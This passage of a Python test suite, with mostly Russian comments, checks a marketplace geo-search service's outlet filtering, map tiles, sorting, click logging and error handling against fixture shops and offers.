1,\n \"bundled\": {\"modelId\": 301, \"outletId\": 261, \"count\": 1},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n ],\n preserve_order=True,\n )\n\n # Что тестируем: отображение в выдаче только и постомат и store аутлетов (постомат-аутлеты выводятся при фильтре по pickup)\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&offer-shipping=pickup,store'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n\n # Что тесируем: В тайлы попадают только постаматы\n response = self.report.request_json(\n 'place=geo&tile=617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&show-outlet=tiles&rids=0&offer-shipping=postomat'\n )\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\"coord\": {\"x\": 617, \"y\": 322}, \"outlets\": []},\n {\"coord\": {\"x\": 617, \"y\": 323}, \"outlets\": []},\n {\"coord\": {\"x\": 617, \"y\": 324}, \"outlets\": [{\"id\": \"261\"}]},\n ]\n },\n preserve_order=True,\n )\n\n # Что тестируем: В выдаче нет других аутлетов, только постоматы. (в т.ч. 
pickup - аутлеты отфильтровываются от postomat)\n response = self.report.request_json('place=geo&rids=0&offer-shipping=postomat&text=good')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"outletId\": 261, \"count\": 1},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"outletId\": 262, \"count\": 1},\n \"outlet\": {\n \"id\": \"262\",\n },\n },\n ],\n },\n preserve_order=True,\n )\n\n def test_home_region_filter(self):\n # Что тестируем: фильтрацию по стране магазина\n response = self.report.request_json('place=geo&home_region_filter=10&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлета магазина другой страны нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 4, \"shops\": 1, \"shopOutlets\": 4}}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"shop\": {\"id\": 104}}, preserve_order=True)\n\n # Проверяем формат\n self.assertFragmentNotIn(\n response,\n {\n \"filters\": [\n {\n \"id\": \"home_region\",\n }\n ]\n },\n )\n\n def test_fesh_filter(self):\n # Что тестируем: фильтрацию по магазину\n response = self.report.request_json('place=geo&fesh=104&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлетов других магазинов нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(response, {\"shop\": {\"id\": 104}}, preserve_order=True)\n\n def test_group_model_expansion(self):\n # Что тестируем: для групповой модели возвращаются модификации\n response = self.report.request_json('place=geo&hyperid=310&point_id=241&grhow=offer')\n self.assertEqual(3, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 310}}, preserve_order=True)\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 311}}, preserve_order=True)\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 312}}, preserve_order=True)\n\n def test_group_model_expansion_multiple_hyperid(self):\n # Что тестируем: для групповой модели не возвращаются модификации если в запросе несколько hyperid\n response = self.report.request_json('place=geo&hyperid=310&hyperid=311&point_id=241&grhow=offer')\n self.assertEqual(2, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 310}}, preserve_order=True)\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 311}}, preserve_order=True)\n\n def test_group_model_expansion_not_a_group_model(self):\n # Что тестируем: hyperid не групповой модели - возвращается только она\n response = self.report.request_json('place=geo&hyperid=311&point_id=241')\n self.assertEqual(1, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"model\": {\"id\": 311}}, preserve_order=True)\n\n def test_group_by(self):\n # Что тестируем: наличие groupBy на выдаче\n response = self.report.request_json('place=geo&hyperid=301&grhow=offer')\n self.assertFragmentIn(response, {\"search\": {\"groupBy\": \"outlet\"}})\n\n response = self.report.request_json('place=geo&hyperid=301&point_id=211&grhow=offer')\n self.assertFragmentIn(response, {\"search\": {\"groupBy\": \"offer\"}})\n\n def 
test_default_sorting_for_guru(self):\n # Что тестируем: сортировка по умолчанию в гуру-категории - SF_CPM\n response = self.report.request_json('place=geo&hid=504&rids=0&debug=1')\n self.assertFragmentIn(response, {\"how\": [{\"args\": Wildcard(\"*\\nsorting_by: 1\\n*\")}]})\n\n def test_empty_results_booknow(self):\n # Что тестируем: выдачу с учетом баундинга пустом квадрате в BookNow-выдаче\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&geo-location=37.15,55.65&geo_bounds_lb=37.0,55.6&geo_bounds_rt=37.2,55.8&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 0, \"shops\": 0, \"shopOutlets\": 0}})\n self.assertFragmentNotIn(response, {\"entity\": \"offer\"})\n\n def test_booknow_with_post_terminals(self):\n # Что тестируем booknow и постаматы отображаются вместе на гео\n response = self.report.request_json('place=geo&hyperid=701&rids=0&show-urls=geo,geoOutlet,geoPointInfo')\n\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 1, \"shopOutlets\": 3}})\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"outlet\": {\n \"id\": \"263\",\n }\n },\n {\n \"outlet\": {\n \"id\": \"261\",\n }\n },\n {\n \"outlet\": {\n \"id\": \"262\",\n }\n },\n ]\n },\n preserve_order=True,\n )\n\n # Что тестируем при show-book-now-only=1 отображаем только один аутлет\n response = self.report.request_json(\n 'place=geo&hyperid=701&rids=0&show-urls=geo,geoOutlet,geoPointInfo&show-book-now-only=1'\n )\n\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}})\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"outlet\": {\n \"id\": \"263\",\n }\n }\n ]\n },\n preserve_order=True,\n )\n\n def test_empty_request_error(self):\n # Что тестируем: выдачу ошибки EMPTY REQUEST в JSON-формате\n response = self.report.request_json('place=geo&rids=0')\n self.assertFragmentIn(response, {\"error\": {\"code\": \"EMPTY_REQUEST\", \"message\": \"Request is empty\"}})\n\n def test_outlet_phones(self):\n # Что тестируем: выдачу telephone в outlet\n response = self.report.request_json('place=geo&fesh=105&rids=0')\n self.assertFragmentIn(\n response,\n {\n \"outlet\": {\n \"name\": \"OUTLET-105-251\",\n \"telephones\": [\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \"123-45-67\",\n \"extensionNumber\": \"89\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \"987-65-43\",\n \"extensionNumber\": \"21\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"812\",\n \"telephoneNumber\": \" 765-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \"765-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"812\",\n \"telephoneNumber\": \"305 26 71\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"+7\",\n \"cityCode\": \"123\",\n \"telephoneNumber\": \"4561234\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"8\",\n \"cityCode\": \"7655\",\n \"telephoneNumber\": \" 4-72110\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"495\",\n \"telephoneNumber\": \" 355-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n 
\"countryCode\": \"\",\n \"cityCode\": \"\",\n \"telephoneNumber\": \"355-43-21\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"\",\n \"telephoneNumber\": \"1-23-456\",\n \"extensionNumber\": \"\",\n },\n {\n \"entity\": \"telephone\",\n \"countryCode\": \"\",\n \"cityCode\": \"\",\n \"telephoneNumber\": \"987654\",\n \"extensionNumber\": \"\",\n },\n ],\n }\n },\n preserve_order=True,\n )\n\n def test_show_cpa_disabled(self):\n response = self.report.request_json('place=geo&text=good52')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\n \"raw\": \"good52\",\n },\n \"description\": \"\",\n \"cpa\": NoKey(\"cpa\"),\n },\n )\n\n def test_geo_flag(self):\n # Что тестируем: неявный флаг &geo=1 в place=geo\n response = self.report.request_json('place=geo&hid=501&rids=1&debug=1')\n self.assertFragmentIn(response, {\"how\": [{\"args\": Wildcard(\"*\\ngeo: true\\n*\")}]})\n\n def test_bad_rs(self):\n # non base64 rs\n response = self.report.request_json('place=geo' '&text=good52' '&owner=offercard' '&rs=B@D_RS')\n self.assertFragmentIn(response, {\"entity\": \"offer\"})\n\n # bad zlib inside of base64 (incorrect header check)\n response = self.report.request_json(\n 'place=geo' '&text=good52' '&owner=offercard' '&rs=ejzjybcsmty0mjftmdaxtzy2mdawbllmdcqylrgnaum-bii%2c'\n )\n self.assertFragmentIn(response, {\"entity\": \"offer\"})\n self.error_log.expect(code=3630, message=Contains('can not decode report state from')).times(4)\n\n def test_urls_for_offercard_without_cpa(self):\n # place=geo&text=good52&owner=offercard&show-urls=geoOutlet,phone,showPhone,cpa&pp=18\n _ = self.report.request_json(\n 'place=geo' '&text=good53' '&owner=offercard' '&show-urls=encrypted,cpa,phone,showPhone' '&pp=18'\n )\n # 4 offers will be found\n self.show_log.expect(pp=18, pp_oi=2, url_type=UrlType.EXTERNAL).times(4)\n self.show_log.expect(pp=18, pp_oi=5, url_type=UrlType.CPA).times(0)\n self.show_log.expect(pp=18, pp_oi=3, url_type=UrlType.SHOW_PHONE).times(4)\n self.show_log.expect(pp=18, pp_oi=3, url_type=UrlType.PHONE).times(4)\n self.click_log.expect(clicktype=ClickType.EXTERNAL, url_type=UrlType.EXTERNAL, pp=18, pp_oi=2).times(4)\n self.click_log.expect(clicktype=ClickType.CPA, url_type=UrlType.CPA, pp=18, pp_oi=5).times(0)\n self.click_log.expect(clicktype=ClickType.PHONE, url_type=UrlType.PHONE, pp=18, pp_oi=3).times(4)\n self.click_log.expect(clicktype=ClickType.SHOW_PHONE, url_type=UrlType.SHOW_PHONE, pp=18, pp_oi=3).times(4)\n\n def test_invalid_glfilter_log_message(self):\n # Что тестируем: в логе должно быть только одно сообщение про невалидный GL фильтр\n self.report.request_json('place=geo&hid=501&rids=0&show-urls=geo,geoOutlet,geoPointInfo&glfilter=123:456')\n self.error_log.expect('Error in glfilters syntax:').once()\n\n def test_model_filtering(self):\n # Что тестируем: фильтрацию моделей на базовых поисках\n response = self.report.request_json('place=geo&hid=601&point_id=251&debug=1')\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"total\": 1,\n \"results\": [\n {\n \"entity\": \"offer\",\n \"outlet\": {\n \"id\": \"251\",\n },\n }\n ],\n }\n },\n )\n\n def test_missing_pp(self):\n response = self.report.request_json(\n 'place=geo&hid=501&rids=0&show-urls=geo,geoOutlet,geoPointInfo&ip=127.0.0.1',\n strict=False,\n add_defaults=DefaultFlags.BS_FORMAT,\n )\n self.error_log.expect('Some client has not set PP value. 
Find and punish him violently').once()\n self.assertEqual(500, response.code)\n\n def test_grhow_one_shop_and_only_one_offer_is_shown(self):\n # What we check: that parameter grhow=shop leads to grouping by shop with only one offer per shop\n response = self.report.request_json('place=geo&point_id=410&text=pepyaka-postomatish&grhow=shop')\n self.assertEqual(1, response.count({\"entity\": \"offer\"}))\n self.assertFragmentIn(response, {\"entity\": \"offer\", \"shop\": {\"id\": 110}})\n\n def test_nosearchresults(self):\n # Что тестируем: отсуствие результатов на выдаче и записей в show log при nosearchresults=1\n response = self.report.request_json(\n 'place=geo&nosearchresults=1&show-outlet=offers,tiles&show-urls=geo,geoOutlet,geoPointInfo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&tile617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&rids=0' # noqa\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 9, \"shops\": 3, \"shopOutlets\": 9}})\n self.assertFragmentNotIn(response, {\"results\": []})\n self.assertFragmentNotIn(response, {\"tiles\": []})\n self.show_log.expect(url=Wildcard('*')).never()\n\n def test_geo_old_for_checkouter(self):\n \"\"\"Отображение в т.ч. инпост-аутлетов в xml-формате для чекаутера\n Проверяем что delivery-for-checkout=1 игнорируется ( MARKETOUT-12509 )\"\"\"\n expected = {\n \"search\": {\n \"total\": 3,\n \"salesDetected\": False,\n \"shopOutlets\": 3,\n \"shops\": 3,\n \"results\": [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"261\"}},\n ],\n }\n }\n response = self.report.request_json(\n 'place=geo&geo=1&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&delivery-for-checkout=1&grhow=shop'\n )\n self.assertFragmentIn(response, expected)\n\n response = self.report.request_json(\n 'place=geo&geo=1&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&grhow=shop'\n )\n self.assertFragmentIn(response, expected)\n\n def test_sort_by_distance_post_terminals(self):\n \"\"\"Отображение постаматов при сортировке по distance. 
Не зависит от &touch\"\"\"\n for add_param in ['', '&touch=1']:\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.12,55.03&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=1®set=1'\n + add_param\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good12\"},\n \"bundleCount\": 4,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 4},\n \"outlet\": {\n \"id\": \"211\",\n \"bundleCount\": 6,\n \"bundled\": {\"modelId\": 301, \"count\": 6},\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 3},\n \"outlet\": {\"id\": \"231\", \"bundleCount\": 3, \"bundled\": {\"modelId\": 301, \"count\": 3}},\n },\n ],\n preserve_order=True,\n )\n\n def test_product_type(self):\n _ = self.report.request_json('place=geo&show-outlet=offers&hyperid=301&rids=0')\n self.access_log.expect(product_type='MODEL')\n\n _ = self.report.request_json('place=geo&show-outlet=offers&hyperid=1000000007&rids=0')\n self.access_log.expect(product_type='VCLUSTER')\n\n _ = self.report.request_json(\n 'place=geo&nosearchresults=1&show-outlet=offers,tiles&show-urls=geo,geoOutlet,geoPointInfo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&tile617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&rids=0' # noqa\n )\n self.access_log.expect(product_type='NONE')\n\n @classmethod\n def prepare_model_search_shops(cls):\n cls.index.shops += [\n Shop(fesh=1101, priority_region=1),\n Shop(fesh=1102, priority_region=1),\n Shop(fesh=1103, priority_region=1),\n Shop(fesh=1104, priority_region=1),\n Shop(fesh=1105, priority_region=1),\n ]\n\n # Аутлеты на \"карте\"\n # Числа в скобках - координаты тайлов при zoom = 10\n # 37.0(617) 37.2(617) 37.4(618) 37.6(618) 37.8(619)\n # 55.8(321) |--------------|---------------|--------------|---------------\n # | | | |\n # | | | |\n # | | | |\n # | | | |\n # 55.6(322) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(1221) | *(1222) | |\n # | | |*Home |\n # | | |*(1241) |\n # 55.4(323) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(1232) | *(1233) | | *(1251)\n # | *(1212) | *(1213) | |\n # | | | |\n # 55.2(324) |--------------|---------------|--------------|---------------\n # | *We | | |\n # | *(1231) | *Work | |\n # | | *(1214) | |\n # | *(1211) | | |\n # 55.0(325) |--------------|---------------|--------------|---------------\n\n cls.index.outlets += [\n Outlet(\n point_id=1211,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.1, 55.1),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=100),\n ),\n Outlet(\n point_id=1212,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.1, 55.3),\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=1213,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.3, 55.3),\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(price=300),\n ),\n Outlet(\n point_id=1214,\n fesh=1101,\n region=1,\n gps_coord=GpsCoord(37.3, 55.1),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=400),\n ),\n Outlet(point_id=1221, fesh=1102, region=1, 
gps_coord=GpsCoord(37.1, 55.5), point_type=Outlet.FOR_STORE),\n Outlet(point_id=1222, fesh=1102, region=1, gps_coord=GpsCoord(37.3, 55.5), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=1231, fesh=1103, region=1, gps_coord=GpsCoord(37.12, 55.12), point_type=Outlet.FOR_STORE),\n Outlet(point_id=1232, fesh=1103, region=1, gps_coord=GpsCoord(37.12, 55.32), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=1233, fesh=1103, region=1, gps_coord=GpsCoord(37.32, 55.32)),\n Outlet(point_id=1241, fesh=1104, region=1, gps_coord=GpsCoord(37.42, 55.42)),\n # Аутлеты вне зоны видимости\n Outlet(point_id=1251, fesh=1105, region=1, gps_coord=GpsCoord(37.7, 55.3)),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=7001,\n fesh=1101,\n carriers=[99],\n options=[\n PickupOption(outlet_id=1211, price=100),\n PickupOption(outlet_id=1212, price=200),\n PickupOption(outlet_id=1213, price=300),\n PickupOption(outlet_id=1214, price=400),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7002,\n fesh=1102,\n carriers=[99],\n options=[PickupOption(outlet_id=1221, price=0), PickupOption(outlet_id=1222, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7003,\n fesh=1103,\n carriers=[99],\n options=[\n PickupOption(outlet_id=1231, price=0),\n PickupOption(outlet_id=1232, price=0),\n PickupOption(outlet_id=1233, price=0),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7004,\n fesh=1104,\n carriers=[99],\n options=[PickupOption(outlet_id=1241, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=7005,\n fesh=1105,\n carriers=[99],\n options=[PickupOption(outlet_id=1251, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n @classmethod\n def prepare_attraction_points(cls):\n '''\n Подготавливаем данные для тестирования точек притяжения (адрес жительства и места работы)\n Есть три точки:\n * Дом\n * Работа\n * Работа, находящаяся далеко за пределами экрана\n Есть 4 пользователя:\n * Без адресов (10) - результат должен совпадать с тем, как-будто пользователя нет\n * С одним адресом (11) - первыми отображаются точки близкие к этому адресу, потом к текущим координатам, потом все остальные\n * С двумя адресами (12) - первыми отображаются точки близкие к домашнему адресу, потом к работе, потом к текущим и все остальные\n * С далеким местом работы (13) - не должно быть точек притяжения\n '''\n home_address = DataSyncYandexUserAddress(address_id='home', gps_coord=HOME_GPS_COORD)\n work_address = DataSyncYandexUserAddress(address_id='work', gps_coord=WORK_GPS_COORD)\n far_address = DataSyncYandexUserAddress(address_id='work', gps_coord=FAR_GPS_COORD)\n cls.datasync.on_request_yandex_user_address(10).respond([])\n cls.datasync.on_request_yandex_user_address(11).respond([home_address])\n cls.datasync.on_request_yandex_user_address(12).respond([work_address, home_address])\n cls.datasync.on_request_yandex_user_address(13).respond([far_address])\n\n @classmethod\n def prepare_search(cls):\n cls.index.cpa_categories += [\n CpaCategory(hid=3001, regions=[1, 213], cpa_type=CpaCategoryType.CPA_NON_GURU),\n CpaCategory(hid=3002, regions=[1, 213], cpa_type=CpaCategoryType.CPC_AND_CPA),\n ]\n # CPA category. 
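# A sketch of the attraction-point ranking described in the docstring above:
# outlets near the home address come first, then ones near the work address,
# then ones near the user's current position, then everything else. The
# "near" radius below is an assumption of this illustration, not a value
# taken from the service.
NEAR_KM = 5.0  # assumed attraction radius


def attraction_tier(outlet_pos, home, work, current, dist):
    """dist: callable (pos_a, pos_b) -> km; missing anchors are None."""
    for tier, anchor in enumerate((home, work, current)):
        if anchor is not None and dist(outlet_pos, anchor) <= NEAR_KM:
            return tier
    return 3


# sort key: (tier, distance to current position); a work anchor far outside
# the viewport never matches, which reproduces the "no attraction" case.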
Offers are sorted as they should appear on search.\n cls.index.offers += [\n Offer(hid=3001, title='kayak 1_from_3001', fesh=1101, ts=30011, pickup_buckets=[7001]),\n Offer(hid=3001, title='kayak 2_from_3001', fesh=1105, ts=30012, pickup_buckets=[7005]), # Out of sight\n Offer(hid=3001, title='kayak 3_from_3001', fesh=1102, ts=30013, pickup_buckets=[7002]),\n Offer(hid=3001, title='4_from_3001', bid=200, fesh=1103, ts=30014, pickup_buckets=[7003]),\n Offer(hid=3001, title='5_from_3001', bid=1000, fesh=1104, ts=30015, pickup_buckets=[7004]),\n ]\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30011).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30012).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30013).respond(0.52)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30014).respond(0.48)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30015).respond(0.5)\n # CPC category. Offers are sorted as they should appear on search.\n cls.index.offers += [\n Offer(hid=3002, title='1_from_3002', bid=50, fesh=1101, ts=30021, pickup_buckets=[7001]),\n Offer(hid=3002, title='2_from_3002', bid=40, fesh=1105, ts=30022, pickup_buckets=[7005]), # Out of sight\n Offer(hid=3002, title='3_from_3002', bid=20, fesh=1102, ts=30023, pickup_buckets=[7002]),\n Offer(hid=3002, title='kayak 4_from_3002', bid=30, fesh=1103, ts=30024, pickup_buckets=[7003]),\n Offer(hid=3002, title='kayak 5_from_3002', bid=10, fesh=1104, ts=30025, pickup_buckets=[7004]),\n ]\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30021).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30022).respond(0.5)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30023).respond(0.52)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30024).respond(0.48)\n cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 30025).respond(0.5)\n\n def test_geo_text_search_in_param_how(self):\n '''Что тестируем: сортировку как на поиске'''\n response = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 10, \"shops\": 4, \"shopOutlets\": 10}})\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 5_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_geo_text_search_autobroker_head_in_param_how(self):\n '''Что тестируем: автоброкер как на поиске, для первого цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, 
shop_id=1104, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n def test_geo_text_search_autobroker_tail_in_param_how(self):\n '''Что тестируем: автоброкер как на поиске, для второго цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n # 1ый оффер подпертый 3им, оффер из CPA категории\n\n # 3ий оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый, оффер из CPC категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1).times(2)\n\n def test_geo_category_search_cpc_autobroker_head_in_param_how(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для первого цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер подпертый 5ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 5ый оффер, не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n\n def test_geo_category_search_cpc_autobroker_tail_in_param_how(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для второго цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n def test_geo_search_outlet_ranking_in_param_how(self):\n '''Что тестируем: сортировку аутлетов по растоянию на поиске'''\n response = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1&fesh=1101'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1211\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1214\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1212\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1213\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_geo_text_search(self):\n '''Что тестируем: сортировку как на поиске'''\n response = self.report.request_json(\n 